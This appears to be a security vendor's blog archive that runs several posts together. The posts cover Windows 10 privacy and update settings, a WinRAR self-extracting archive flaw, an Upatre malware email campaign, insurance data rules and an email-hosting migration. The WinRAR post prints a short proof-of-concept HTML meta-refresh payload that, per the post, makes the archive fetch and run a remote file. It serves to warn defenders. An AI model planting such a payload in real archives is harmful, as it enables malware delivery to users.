By Michael Imlay

Windows 10 is a step toward personal computing; and to a world that is more mobile.  As customers and partners embark on the Windows 10 journey, we thought it might be useful to list some of the issues we’re hearing about and discuss viable workarounds.


  • Forced Automatic Updates for Windows 10 Home Edition

Windows 10 Home Edition has automatic updates that cannot be disabled, while Windows 10 Professional Edition allows you to defer updates up to a few months, after which they will be installed automatically.

You can only uninstall/disable updates/upgrades after they have been installed and you cannot chose to simply pass an update, even on apps from the Windows Store. This has both good and bad implications. The good implications are that from a security standpoint, your system will always be up to date with the latest security updates and patches. However, in some cases, updates can break systems and cause issues, and you’ll be the guinea pig. For example, Windows 10 pushed an update for nVidia Drivers which caused many systems to become unbootable and leaving many users having to reinstall Window. There was also a security update that was pushed out which caused many users to get stuck into a “boot loop” and unable to boot into Windows. However, even with the minor downfalls to forced updates, overall for all users this is going to make your system much more secure as all security patches will be pushed to your system allowing Microsoft to quickly roll out fixes and preventing your system from becoming compromised. In the past, many users did not install updates on previous versions of Windows which put their system, and others, at risk. This changes all that.

You can setup Windows Update to prompt you to restart instead of restarting automatically as well as enabling defer upgrades. You can do this by going to Start/Settings/Update and Security/Windows Update/Advanced Options.

Imlay's Blog Post

  • Cortana Comes with Strings

Under the default “Express” settings, Windows 10 is configured to send various information to Microsoft and other parties, including the collection of user contacts, calendar data, and “associated input data” to personalize “speech, typing, and inking input,” typing and inking data to improve recognition, allowing apps to use a unique “advertising ID” for analytics and advertising personalization (functionality introduced by Windows 8.1) and allow apps to request the user’s location data and send this data to Microsoft and “trusted partners” to improve location detection (Windows 8 had similar settings, except that location data collection did not include “trusted partners”).

Users can opt out from most of this data collection, but telemetry data for error reporting and usage is also sent to Microsoft, and this cannot be disabled on non-enterprise versions of Windows 10. The use of Cortana also requires the collection of data “such as your device location, data from your calendar, the apps you use, data from your emails and text messages, who you call, your contacts and how often you interact with them on your device” to personalize its functionality. Microsoft Services Agreement reads that the company’s online services may automatically “download software updates or configuration changes, including those that prevent you from accessing the Services, playing counterfeit games, or using unauthorized hardware peripheral devices.”

Critics interpreted this statement as implying that Microsoft would scan for and delete pirated software installed on devices running Windows 10. Additionally, Windows 10 has a feature, enabled by default, to share WiFi passwords to your contacts. This means that if you connect to your personal WiFi network at home, your WiFi password is shared with all your contacts so if they visit your home, their Windows 10 system will automatically connect to your network, without ever providing them the WiFi password. This could pose a security risk.

However, do not fear! Thankfully, Microsoft has provided a dedicated privacy section under settings which allows a user to disable most of these settings. You can access these settings by going to start/settings/privacy. Additionally, you can also disable WiFi Sense (so that your networks/passwords aren’t shared with your contacts) by going to Settings > Network & Internet > Wi-Fi > Manage Wi-Fi settings. In here, you basically want to disable every option you see, as well as tell Windows 10 to forget any Wi-Fi networks you’ve signed into in the past.

Photo 2

Photo 3

Photo 4

  • Windows 10 Driver Model

Windows 10 introduces the new WDDM 2.0 driver model including DirectX 12 (which is a Windows 10 exclusive for gamers) This is overall a better driver model and as long as your hardware is supported in Windows 10, there shouldn’t be any issues upgrading. However, many devices are unsupported, or have issues under Windows 10 with the new driver model. As an example, I attempted to upgrade my work laptop (Dell Latitude) to Windows 10. However, there is an issue with the video drivers under Windows 10 that prevents me from using my 3rd monitor. I spent countless hours trying to get the 3rd monitor to work, but ended up having to revert back to Windows 8.1. At home, my HP Photosmart D110 was unstable under Windows, printer would work, but scanner function wouldn’t work. Additionally, my GeForce GTX 980 Ti Video Card (new $700 video card) was initially listed as unsupported with Windows 10 upon release (although this has now been fixed). So, a key point here is to make sure your hardware is fully supported and to always have a fall back option in case something isn’t supported that isn’t known yet.

  • New Start Menu Limitations

If you are a power user and have a lot of applications installed, it may break the new start menu. If you have over 500 items in your start menu, it will break it.

  • Distributed Update System

As Windows 10 automatically downloads updates to your system, Windows 10 is sharing those updates with other computers on your network and on the internet. This poses a security concern as this works much like a torrent system does and other users computers are downloading updates directly from your system. As your system is sharing these updates, it may slow your internet connection down and many ISP’s, such as AT&T, Mediacom, and Cox have bandwidth limits in place which this feature is causing many users to face overage charges on metered connections.

However, you can disable, or change the update system by going to Start/Settings/Update and Security/Windows Update/Advanced Options/Choose how updates are delivered. From here, you can disable the Distributed Update System completely, or only enable it for devices on your own network.

Photo 5

  • Windows 7/8.1 users are being “forced” to upgrade to Windows 10.

If you have automatic updates enabled, Microsoft is downloading Windows 10 to your computer, even if you didn’t opt in for the Windows 10 upgrade. This is causing many people to see a loss of free disk space (3.5 GB to 6 GB) because of this download, as well as facing overage charges of metered connections.

Researchers at Vulnerability-Lab have discovered an issue in WinRAR software that allows for remote code execution for self extracting exe files. Self Extracting Archives (SFX files) are executable files that contains the necessary code to extract a file without needing an extractor pre-installed. So you could send someone one of these self extracting files without needing to worry if they have something like WinRAR or 7zip installed already. This can be convenient when dealing with external clients in which you may not know what software they have.

OO7XQL3Q9C (1)


This issue that was discovered has to do with the display text section of the SFX file when opened. The text section supports HTML and can remotely retrieve that HTML info needed. In the proof of concept provided by Vulnerability-Lab, that HTML could point to a server containing malicious executables and WinRAR will download and execute the remote file.


Simple HTML like this in the text window could point to the server containing malicious code to be executed:

<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=″</head></html>

Something I noticed that did work with these was to use the WinRAR option of right clicking to extract the file. This prevents opening the display window where the malicious HTML may be lurking and simply extracts the original file. But that of course doesn’t mean the extracted file is safe.




Since the HTML is interpreted as soon as the SFX file is opened, that means there’s no other user interaction required for the vulnerability to be exploited. The original file that was archived doesn’t even need to be extracted. Simply opening the file is enough. I was able to recreate this pretty simply so this could be something we will see in the future in malware campaigns. Since the SFX file still contains an exe extension, hopefully most users will already be cautious of unknown exe’s enough to know not to open it. This is certainly a prime example of why unknown attachments should be avoided.

This morning we’ve been seeing yet another offering from the Upatre guys. This time it comes in with a rather lengthy, by comparison, email with the subject line “Attorney-client agreement”. This story line certainly leaves out a few major details as it begins with a lawyer apparently already in court fighting against some sort of breach of contract suit against the recipient. The opening paragraph even forgives the intended targets for missing court this morning, citing that the court “understood”. This must come as a real shock to those of us who don’t keep a lawyer on retainer and those who didn’t realize they were being sued. It probably would’ve been really nice of this mystery lawyer to let you know that this was going on before it got to this point, I would think.


Regardless, the email goes on to give a vague report on what happened in court this day and a few things that the new defendant can expect as this fake lawsuit unfolds. This is a very classic, although slightly long-winded, social engineering technique employed by cyber thieves to both raise a little fear and a lot of curiosity in their victims which will then hopefully entice them into falling for their ruse. The payload in this attack lives in an accompanying attachment. Each of these attachments are quasi randomly named by stringing together three different words from an apparent wordlist supplied by the command and control server. This randomization makes it slightly harder to nail down these files, simply because one cannot block based on the filename alone. Otherwise, it’s business as usual when it comes to stopping these nuisances.


One interesting detail about this line of attacks is that they seem to be targeting older, out of date PCs. After running the samples on a couple different operating systems, they only seemed to want to carry out their malicious intent on machines running Windows XP (I was using SP3). On newer versions it would shut itself down almost immediately after execution. Once operational though, this malware begins to hijack system processes to get a foothold on its new victim. It then reaches out to check its IP address and then looks to communicate with the IP on port 12299 where it reports back with information about the new target such as the IP it had just looked up and the computer name. Following this, the malware adds a good number of registry entries dealing with security certificates, mostly disallowing them and peeks around for debugging tools.

Even on Windows XP these samples seemed a little rickety as they tended to crash after a fairly short period of time, but they did have the best success rate on the XP machines. I wouldn’t be surprised though if this little issue is quickly resolved and we start seeing the next campaign from these guys within the day. Seeing several different themes from this particular family of malware has been commonplace and happening on a daily basis for quite sometime now.

AppRiver’s SecureTide has everyone covered though as we’re blocking these preemptively to help keep your machines happy and healthy.

By Gretchen Clarke

Not unlike other vertical market business entities, insurance companies face a growing set of regulations and guidelines for protecting their data.

malvertising image

With an ever-evolving IT threat landscape, hacker attacks and network intrusions, protecting sensitive customer information is a growing concern for the insurance industry.  What’s more, the insurance industry may face security concerns from both sides of the table – serving the security needs of the insurers and serving the security needs of the insured.  To help illustrate, take a look at the list of sensitive information needed in order to purchase insurance:

  • Full Name
  • Date of Birth
  • Address
  • Social Security Number
  • Payment information
  • Annual income
  • Banking information
  • Other

While this information is necessary for those wanting to be insured, have you ever wondered where your information goes?  Where it’s stored?  Is it scanned into a shared file on a network or did you complete it online?  Is it emailed to the corporate office?

In the last few years, nine states have added regulations mandating that insurance companies archive and encrypt any emails containing personal/private data.  These states include:  California, Colorado, Delaware, Massachusetts, New York, Pennsylvania, Rhode Island, South Dakota, Vermont, and West Virginia, while many other states are adopting legislation to follow suit.

It’s not just about being compliant with federal and state laws.  It’s also about building customer trust.  By enhancing your service offering with best-in-breed security solutions, you’re telling customers that their privacy matters and that you’re taking the necessary steps to keep sensitive information secure.

To those companies who have traded in photocopies for online documents and to consumers who are concerned about protecting their personal/private data, we encourage you to take a look at your security footprint today.  And, if you have any questions along the way, we are here to help.

To learn more about AppRiver’s  cloud-based email encryption and email archiving & compliance solutions, please contact  (And make sure to ask about our current promotions on compliance-ready solutions!)

Last week, managed services provider Apptix announced it is shutting down its hosted Exchange service and selling part of its cloud customer division to GoDaddy. The plan is for Apptix customers who are currently on its hosted Exchange platform to migrate to GoDaddy’s Office 365.

Startup Stock Photos

Startup Stock Photos

The question is, who do you want to host your email and who would you like to work with?

In the IT world, that choice is critical because one size rarely fits all. Customers being moved off the Apptix Exchance service would be wise to ask several questions before committing to GoDaddy Office 365 (or any other email provider for that matter.)

Quite obviously, price is one key factor, but you also need to know just what you’re getting for your money. For example, does your monthly fee cover customer care? If so, for how long? And do you speak to a live person who knows the technology?

Closely related to the question of price are your terms. What if you don’t like the new provider? Can you get your money back? Are you free to leave without penalty? And can you get month-to-month, pay-as-you-go billing?

Another issue is compatibility. In many cases, email is connected to other services like spam & virus protection, email encryption, and archiving & eDiscovery. Will your new platform support these features? And will they support your provider or do they force you to a different one?

As you discuss these issues, don’t forget to talk about security. How much control to you have over where your data is stored? How serious is the provider about protecting your information? Is it built in at every level, or is it an “after-market” option?

These are just a few of the basic questions you should pose to anyone before you allow them to host your email. For some Apptix customers, moving to GoDaddy might be a great choice, always remember that it is your choice to make.

Have questions about AppRiver’s Secure Hosted Exchange? Click here to learn more.